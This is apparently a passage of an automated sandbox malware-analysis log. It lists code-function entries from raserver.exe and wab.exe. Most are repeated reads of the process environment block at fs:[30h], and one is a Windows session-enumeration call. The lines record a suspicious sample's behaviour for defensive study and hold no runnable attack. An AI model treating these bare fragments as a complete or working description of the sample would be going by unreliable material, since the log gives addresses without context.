        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_00C8ACA0 LoadLibraryW,GetProcAddress,GetProcAddress,WTSEnumerateSessionsW,GetProcessHeap,HeapAlloc,WTSFreeMemory,WTSFreeMemory,WTSQuerySessionInformationW,WTSQuerySessionInformationW,StrCmpIW,GetProcessHeap,HeapAlloc,SafeArrayCreateVector,SafeArrayAccessData,SysAllocString,SafeArrayUnaccessData,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,WTSFreeMemory,WTSFreeMemory,SafeArrayDestroy,SysFreeString,25_2_00C8ACA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22419240 mov eax, dword ptr fs:[00000030h]20_2_22419240
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22419240 mov eax, dword ptr fs:[00000030h]20_2_22419240
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245724D mov eax, dword ptr fs:[00000030h]20_2_2245724D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A8243 mov eax, dword ptr fs:[00000030h]20_2_224A8243
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A8243 mov ecx, dword ptr fs:[00000030h]20_2_224A8243
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241A250 mov eax, dword ptr fs:[00000030h]20_2_2241A250
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224AD250 mov ecx, dword ptr fs:[00000030h]20_2_224AD250
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224DB256 mov eax, dword ptr fs:[00000030h]20_2_224DB256
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224DB256 mov eax, dword ptr fs:[00000030h]20_2_224DB256
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22426259 mov eax, dword ptr fs:[00000030h]20_2_22426259
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22424260 mov eax, dword ptr fs:[00000030h]20_2_22424260
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22424260 mov eax, dword ptr fs:[00000030h]20_2_22424260
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22424260 mov eax, dword ptr fs:[00000030h]20_2_22424260
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224ED26B mov eax, dword ptr fs:[00000030h]20_2_224ED26B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224ED26B mov eax, dword ptr fs:[00000030h]20_2_224ED26B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241826B mov eax, dword ptr fs:[00000030h]20_2_2241826B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22449274 mov eax, dword ptr fs:[00000030h]20_2_22449274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22461270 mov eax, dword ptr fs:[00000030h]20_2_22461270
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22461270 mov eax, dword ptr fs:[00000030h]20_2_22461270
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h]20_2_224D0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h]20_2_224D0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h]20_2_224D0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h]20_2_224D0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h]20_2_224D0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h]20_2_224D0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h]20_2_224D0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h]20_2_224D0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h]20_2_224D0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h]20_2_224D0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h]20_2_224D0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h]20_2_224D0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22457208 mov eax, dword ptr fs:[00000030h]20_2_22457208
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22457208 mov eax, dword ptr fs:[00000030h]20_2_22457208
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224F5227 mov eax, dword ptr fs:[00000030h]20_2_224F5227
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241823B mov eax, dword ptr fs:[00000030h]20_2_2241823B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2242A2C3 mov eax, dword ptr fs:[00000030h]20_2_2242A2C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2242A2C3 mov eax, dword ptr fs:[00000030h]20_2_2242A2C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2242A2C3 mov eax, dword ptr fs:[00000030h]20_2_2242A2C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2242A2C3 mov eax, dword ptr fs:[00000030h]20_2_2242A2C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2242A2C3 mov eax, dword ptr fs:[00000030h]20_2_2242A2C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2244B2C0 mov eax, dword ptr fs:[00000030h]20_2_2244B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2244B2C0 mov eax, dword ptr fs:[00000030h]20_2_2244B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2244B2C0 mov eax, dword ptr fs:[00000030h]20_2_2244B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2244B2C0 mov eax, dword ptr fs:[00000030h]20_2_2244B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2244B2C0 mov eax, dword ptr fs:[00000030h]20_2_2244B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2244B2C0 mov eax, dword ptr fs:[00000030h]20_2_2244B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2244B2C0 mov eax, dword ptr fs:[00000030h]20_2_2244B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224292C5 mov eax, dword ptr fs:[00000030h]20_2_224292C5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224292C5 mov eax, dword ptr fs:[00000030h]20_2_224292C5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241B2D3 mov eax, dword ptr fs:[00000030h]20_2_2241B2D3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241B2D3 mov eax, dword ptr fs:[00000030h]20_2_2241B2D3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241B2D3 mov eax, dword ptr fs:[00000030h]20_2_2241B2D3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2244F2D0 mov eax, dword ptr fs:[00000030h]20_2_2244F2D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2244F2D0 mov eax, dword ptr fs:[00000030h]20_2_2244F2D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h]20_2_224D12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h]20_2_224D12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h]20_2_224D12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h]20_2_224D12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h]20_2_224D12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h]20_2_224D12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h]20_2_224D12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h]20_2_224D12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h]20_2_224D12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h]20_2_224D12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h]20_2_224D12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h]20_2_224D12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h]20_2_224D12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h]20_2_224D12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224302E1 mov eax, dword ptr fs:[00000030h]20_2_224302E1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224302E1 mov eax, dword ptr fs:[00000030h]20_2_224302E1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224302E1 mov eax, dword ptr fs:[00000030h]20_2_224302E1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224F52E2 mov eax, dword ptr fs:[00000030h]20_2_224F52E2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224DF2F8 mov eax, dword ptr fs:[00000030h]20_2_224DF2F8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224192FF mov eax, dword ptr fs:[00000030h]20_2_224192FF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245E284 mov eax, dword ptr fs:[00000030h]20_2_2245E284
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245E284 mov eax, dword ptr fs:[00000030h]20_2_2245E284
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A0283 mov eax, dword ptr fs:[00000030h]20_2_224A0283
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A0283 mov eax, dword ptr fs:[00000030h]20_2_224A0283
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A0283 mov eax, dword ptr fs:[00000030h]20_2_224A0283
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224F5283 mov eax, dword ptr fs:[00000030h]20_2_224F5283
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245329E mov eax, dword ptr fs:[00000030h]20_2_2245329E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245329E mov eax, dword ptr fs:[00000030h]20_2_2245329E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224302A0 mov eax, dword ptr fs:[00000030h]20_2_224302A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224302A0 mov eax, dword ptr fs:[00000030h]20_2_224302A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224352A0 mov eax, dword ptr fs:[00000030h]20_2_224352A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224352A0 mov eax, dword ptr fs:[00000030h]20_2_224352A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224352A0 mov eax, dword ptr fs:[00000030h]20_2_224352A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224352A0 mov eax, dword ptr fs:[00000030h]20_2_224352A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E92A6 mov eax, dword ptr fs:[00000030h]20_2_224E92A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E92A6 mov eax, dword ptr fs:[00000030h]20_2_224E92A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E92A6 mov eax, dword ptr fs:[00000030h]20_2_224E92A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E92A6 mov eax, dword ptr fs:[00000030h]20_2_224E92A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224B72A0 mov eax, dword ptr fs:[00000030h]20_2_224B72A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224B72A0 mov eax, dword ptr fs:[00000030h]20_2_224B72A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224B62A0 mov eax, dword ptr fs:[00000030h]20_2_224B62A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224B62A0 mov ecx, dword ptr fs:[00000030h]20_2_224B62A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224B62A0 mov eax, dword ptr fs:[00000030h]20_2_224B62A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224B62A0 mov eax, dword ptr fs:[00000030h]20_2_224B62A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224B62A0 mov eax, dword ptr fs:[00000030h]20_2_224B62A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224B62A0 mov eax, dword ptr fs:[00000030h]20_2_224B62A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A92BC mov eax, dword ptr fs:[00000030h]20_2_224A92BC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A92BC mov eax, dword ptr fs:[00000030h]20_2_224A92BC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A92BC mov ecx, dword ptr fs:[00000030h]20_2_224A92BC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A92BC mov ecx, dword ptr fs:[00000030h]20_2_224A92BC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h]20_2_224A2349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h]20_2_224A2349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h]20_2_224A2349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h]20_2_224A2349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h]20_2_224A2349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h]20_2_224A2349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h]20_2_224A2349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h]20_2_224A2349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h]20_2_224A2349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h]20_2_224A2349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h]20_2_224A2349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h]20_2_224A2349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h]20_2_224A2349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h]20_2_224A2349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h]20_2_224A2349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241D34C mov eax, dword ptr fs:[00000030h]20_2_2241D34C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241D34C mov eax, dword ptr fs:[00000030h]20_2_2241D34C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224F5341 mov eax, dword ptr fs:[00000030h]20_2_224F5341
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22419353 mov eax, dword ptr fs:[00000030h]20_2_22419353
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22419353 mov eax, dword ptr fs:[00000030h]20_2_22419353
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A035C mov eax, dword ptr fs:[00000030h]20_2_224A035C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A035C mov eax, dword ptr fs:[00000030h]20_2_224A035C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A035C mov eax, dword ptr fs:[00000030h]20_2_224A035C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A035C mov ecx, dword ptr fs:[00000030h]20_2_224A035C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A035C mov eax, dword ptr fs:[00000030h]20_2_224A035C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A035C mov eax, dword ptr fs:[00000030h]20_2_224A035C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224EA352 mov eax, dword ptr fs:[00000030h]20_2_224EA352
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224DF367 mov eax, dword ptr fs:[00000030h]20_2_224DF367
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224C437C mov eax, dword ptr fs:[00000030h]20_2_224C437C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22427370 mov eax, dword ptr fs:[00000030h]20_2_22427370
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22427370 mov eax, dword ptr fs:[00000030h]20_2_22427370
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22427370 mov eax, dword ptr fs:[00000030h]20_2_22427370
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A930B mov eax, dword ptr fs:[00000030h]20_2_224A930B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A930B mov eax, dword ptr fs:[00000030h]20_2_224A930B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A930B mov eax, dword ptr fs:[00000030h]20_2_224A930B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245A30B mov eax, dword ptr fs:[00000030h]20_2_2245A30B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245A30B mov eax, dword ptr fs:[00000030h]20_2_2245A30B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245A30B mov eax, dword ptr fs:[00000030h]20_2_2245A30B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241C310 mov ecx, dword ptr fs:[00000030h]20_2_2241C310
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22440310 mov ecx, dword ptr fs:[00000030h]20_2_22440310
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E132D mov eax, dword ptr fs:[00000030h]20_2_224E132D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E132D mov eax, dword ptr fs:[00000030h]20_2_224E132D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2244F32A mov eax, dword ptr fs:[00000030h]20_2_2244F32A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22417330 mov eax, dword ptr fs:[00000030h]20_2_22417330
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224DC3CD mov eax, dword ptr fs:[00000030h]20_2_224DC3CD
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2242A3C0 mov eax, dword ptr fs:[00000030h]20_2_2242A3C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2242A3C0 mov eax, dword ptr fs:[00000030h]20_2_2242A3C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2242A3C0 mov eax, dword ptr fs:[00000030h]20_2_2242A3C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2242A3C0 mov eax, dword ptr fs:[00000030h]20_2_2242A3C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2242A3C0 mov eax, dword ptr fs:[00000030h]20_2_2242A3C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2242A3C0 mov eax, dword ptr fs:[00000030h]20_2_2242A3C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224283C0 mov eax, dword ptr fs:[00000030h]20_2_224283C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224283C0 mov eax, dword ptr fs:[00000030h]20_2_224283C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224283C0 mov eax, dword ptr fs:[00000030h]20_2_224283C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224283C0 mov eax, dword ptr fs:[00000030h]20_2_224283C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A63C0 mov eax, dword ptr fs:[00000030h]20_2_224A63C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224DB3D0 mov ecx, dword ptr fs:[00000030h]20_2_224DB3D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224303E9 mov eax, dword ptr fs:[00000030h]20_2_224303E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224303E9 mov eax, dword ptr fs:[00000030h]20_2_224303E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224303E9 mov eax, dword ptr fs:[00000030h]20_2_224303E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224303E9 mov eax, dword ptr fs:[00000030h]20_2_224303E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224303E9 mov eax, dword ptr fs:[00000030h]20_2_224303E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224303E9 mov eax, dword ptr fs:[00000030h]20_2_224303E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224303E9 mov eax, dword ptr fs:[00000030h]20_2_224303E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224303E9 mov eax, dword ptr fs:[00000030h]20_2_224303E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224DF3E6 mov eax, dword ptr fs:[00000030h]20_2_224DF3E6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224F53FC mov eax, dword ptr fs:[00000030h]20_2_224F53FC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243E3F0 mov eax, dword ptr fs:[00000030h]20_2_2243E3F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243E3F0 mov eax, dword ptr fs:[00000030h]20_2_2243E3F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243E3F0 mov eax, dword ptr fs:[00000030h]20_2_2243E3F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224563FF mov eax, dword ptr fs:[00000030h]20_2_224563FF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241E388 mov eax, dword ptr fs:[00000030h]20_2_2241E388
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241E388 mov eax, dword ptr fs:[00000030h]20_2_2241E388
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241E388 mov eax, dword ptr fs:[00000030h]20_2_2241E388
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2244438F mov eax, dword ptr fs:[00000030h]20_2_2244438F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2244438F mov eax, dword ptr fs:[00000030h]20_2_2244438F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224F539D mov eax, dword ptr fs:[00000030h]20_2_224F539D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22418397 mov eax, dword ptr fs:[00000030h]20_2_22418397
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22418397 mov eax, dword ptr fs:[00000030h]20_2_22418397
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22418397 mov eax, dword ptr fs:[00000030h]20_2_22418397
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2247739A mov eax, dword ptr fs:[00000030h]20_2_2247739A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2247739A mov eax, dword ptr fs:[00000030h]20_2_2247739A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224433A5 mov eax, dword ptr fs:[00000030h]20_2_224433A5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224533A0 mov eax, dword ptr fs:[00000030h]20_2_224533A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224533A0 mov eax, dword ptr fs:[00000030h]20_2_224533A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22422050 mov eax, dword ptr fs:[00000030h]20_2_22422050
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224C705E mov ebx, dword ptr fs:[00000030h]20_2_224C705E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224C705E mov eax, dword ptr fs:[00000030h]20_2_224C705E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2244B052 mov eax, dword ptr fs:[00000030h]20_2_2244B052
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A6050 mov eax, dword ptr fs:[00000030h]20_2_224A6050
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A106E mov eax, dword ptr fs:[00000030h]20_2_224A106E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224F5060 mov eax, dword ptr fs:[00000030h]20_2_224F5060
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22431070 mov eax, dword ptr fs:[00000030h]20_2_22431070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22431070 mov ecx, dword ptr fs:[00000030h]20_2_22431070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22431070 mov eax, dword ptr fs:[00000030h]20_2_22431070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22431070 mov eax, dword ptr fs:[00000030h]20_2_22431070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22431070 mov eax, dword ptr fs:[00000030h]20_2_22431070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22431070 mov eax, dword ptr fs:[00000030h]20_2_22431070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22431070 mov eax, dword ptr fs:[00000030h]20_2_22431070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22431070 mov eax, dword ptr fs:[00000030h]20_2_22431070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22431070 mov eax, dword ptr fs:[00000030h]20_2_22431070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22431070 mov eax, dword ptr fs:[00000030h]20_2_22431070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22431070 mov eax, dword ptr fs:[00000030h]20_2_22431070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22431070 mov eax, dword ptr fs:[00000030h]20_2_22431070
